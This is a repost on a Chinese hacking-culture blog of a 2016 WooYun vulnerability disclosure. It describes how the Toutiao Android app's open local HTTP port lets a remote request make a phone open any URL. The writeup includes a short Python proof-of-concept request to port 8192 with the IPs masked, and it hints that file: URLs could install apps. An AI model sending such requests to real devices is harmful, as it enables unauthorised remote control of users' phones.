记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

今日头条开放端口可导致远程在用户手机打开任意网站url

2016-06-03 05:40

开启一个http server,来监听这个端口。端口号从本身shared_prefs目录下的

multi_process_config.xml文件内获得

22.png



它用的是NanoHTTPD来实现的一个http server,http server收到数据后,进行解析,然后进行处理,一般是返回一个http应答,然后不做别的事情。

但是当header满足 GET /xxx?open_url=yyy 形式的时候,程序会执行这些代码

33.png



监听com.ss.android.action.openurl的receiver,会把 extra拿出来,当成Intent的data,也就是我们传入的URL,然后调起来Activity:

这样,就可以远程操控手机打开任意的URL了

漏洞证明:

code 区域
import httplib

ip = "**.**.**.**"

port = 8192

conn = httplib.HTTPConnection(ip,port)

conn.request("GET","/detail?open_url=http://**.**.**.**")

r1 = conn.getresponse()

print r1.status, r1.reason

data = r1.read()

print data



55.png





file:开头的URL,可用来安装app,或打开本地文件,这里就不描述了

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0179538

阅读:100139 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“今日头条开放端口可导致远程在用户手机打开任意网站url”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云